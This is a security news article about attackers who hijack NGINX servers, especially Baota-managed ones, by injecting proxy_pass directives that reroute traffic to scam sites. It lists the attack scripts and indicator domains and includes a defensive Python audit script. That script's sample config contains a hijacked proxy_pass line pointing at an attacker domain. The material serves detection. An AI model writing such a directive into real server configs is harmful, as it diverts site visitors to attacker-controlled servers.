Cybercriminals Exploit NGINX Servers to Divert Web Traffic to Malicious Sites
A sophisticated cyberattack campaign has emerged, wherein threat actors are compromising NGINX servers to clandestinely redirect web traffic to malicious destinations. These attackers, previously associated with React2Shell exploits, are now focusing on NGINX configurations, particularly those managed via the Baota (BT) panel, which is extensively utilized across Asia.
Mechanism of the Attack
Unlike traditional malware deployment, the perpetrators manipulate legitimate server configuration files. By embedding malicious directives within NGINX’s location blocks, they intercept user traffic and reroute it through servers under their control, often without immediate detection by the site owners.
Central to this attack is the misuse of the `proxy_pass` directive, a standard NGINX feature intended to forward traffic to backend servers, such as PHP applications. The attackers repoint this directive at domains they control, including gambling and scam sites. To further obfuscate their activities, they employ the `proxy_set_header` directive so that the hijacked traffic retains headers that appear legitimate, which complicates detection through standard logging mechanisms.
Automated Attack Workflow
The campaign utilizes an automated sequence of shell scripts to facilitate the attack:
– zx.sh (The Orchestrator): Initiates the environment and downloads necessary tools, serving as the entry point for the attack chain.
– bt.sh (Baota Injector): Scans for Baota panel configurations and injects malicious code, targeting `/www/server/panel/vhost/nginx`.
– 4zdh.sh (Advanced Injection): Injects payloads into NGINX configurations after validation, focusing on generic Linux NGINX installations.
– zdh.sh (Advanced Injection): Similar to 4zdh.sh, with added configuration verification; it also collects and uploads the list of hijacked domains.
– ok.sh (Exfiltration): Acts as an entry point for the attack chain, sending data to the attackers’ command-and-control (C2) server.
Targeted Domains and Indicators of Compromise
The campaign predominantly targets Asian country-code top-level domains (ccTLDs) such as .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.
Administrators are advised to scrutinize their NGINX configuration files for unexpected `proxy_pass` directives pointing to the following known malicious domains:
– xzz.pier46[.]com: Suspected C2/malware infrastructure; active (unverified); observed in malicious campaigns.
– ide.hashbank8[.]com: Suspected C2/malware infrastructure; active (unverified); used for attacker communications.
– th.cogicpt[.]org: Suspected C2/malware infrastructure; active (unverified); potential exfiltration endpoint.
Additionally, network logs indicating traffic to IP address 158.94.210[.]227 may signify active communication with the attackers’ infrastructure.
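A defender's audit pass over an NGINX configuration, added here as an example (it is not code from the article or from the campaign's scripts): it parses one file's text, tracks the enclosing `server`/`location` block, and flags every `proxy_pass` whose target is not a local backend or an `upstream` defined in the same file, with the indicators quoted above re-fanged for matching. The `ALLOWED_HOSTS` set, the one-directive-per-line parsing and the sample vhost are assumptions made for this example.

```python
import re
from urllib.parse import urlparse

# Local backends a vhost normally proxies to (assumption; urlparse reports http://unix:/x.sock as host "unix").
ALLOWED_HOSTS = {"127.0.0.1", "localhost", "::1", "unix"}
# Indicators quoted in the article, re-fanged so they match inside config text.
KNOWN_BAD = {"xzz.pier46.com", "ide.hashbank8.com", "th.cogicpt.org", "158.94.210.227"}
DIRECTIVE_RE = re.compile(r"^(\w+)\s+([^;{]*);")

def audit_nginx_config(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line, enclosing block, target, verdict) for each proxy_pass directive;
    verdict is known_bad (article IoC), external, dynamic ($variable) or local."""
    upstreams = set(re.findall(r"^\s*upstream\s+(\S+)\s*\{", text, re.M))
    findings, stack = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop '#' comments
        if line.endswith("{"):                   # block opener, e.g. "location ~ \.php$ {"
            stack.append(line[:-1].strip())
        elif line == "}" and stack:
            stack.pop()
        elif (m := DIRECTIVE_RE.match(line)) and m.group(1) == "proxy_pass":
            target = m.group(2).strip()
            host = (urlparse(target).hostname or target).lower()
            if host.startswith("$"):
                verdict = "dynamic"              # runtime-resolved target: review by hand
            elif any(bad in target for bad in KNOWN_BAD):
                verdict = "known_bad"
            elif host in allowed_hosts or host in upstreams:
                verdict = "local"                # an upstream {} in this file counts as local
            else:
                verdict = "external"
            findings.append((lineno, stack[-1] if stack else "<top>", target, verdict))
    return findings

# Constructed vhost: a legitimate PHP backend plus one hijacked location block.
SAMPLE_CONF = """\
upstream php_backend { server 127.0.0.1:9000; }
server {
    location ~ \\.php$ {
        proxy_pass http://php_backend;
    }
    location / {
        proxy_set_header Host $host;
        proxy_pass https://xzz.pier46.com/$request_uri;
    }
}
"""

if __name__ == "__main__":
    print(*[f for f in audit_nginx_config(SAMPLE_CONF) if f[3] != "local"], sep="\n")
```

Run it over each file under `/www/server/panel/vhost/nginx` (the Baota path named above) or your distribution's NGINX include directory; any verdict other than `local` deserves a manual look.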
Mitigation Strategies
To defend against such attacks, administrators should implement the following measures:
1. Regular Configuration Audits: Periodically review NGINX configuration files for unauthorized modifications, especially unexpected `proxy_pass` directives.
2. Update and Patch Systems: Ensure that all server software, including NGINX and associated management panels such as Baota, is up to date with the latest security patches.
3. Restrict Access: Limit access to server management interfaces and configuration files to authorized personnel only.
4. Monitor Network Traffic: Utilize intrusion detection systems (IDS) to monitor for unusual outbound traffic patterns that may indicate data exfiltration or communication with malicious domains.
5. Implement Web Application Firewalls (WAF): Deploy WAFs to filter and monitor HTTP traffic between a web application and the Internet, providing an additional layer of security.
Conclusion
The exploitation of NGINX servers through configuration manipulation underscores the evolving tactics of cybercriminals. By leveraging legitimate server features for malicious purposes, attackers can achieve their objectives with minimal detection. It is imperative for organizations to adopt proactive security measures, conduct regular system audits, and stay informed about emerging threats to safeguard their digital assets.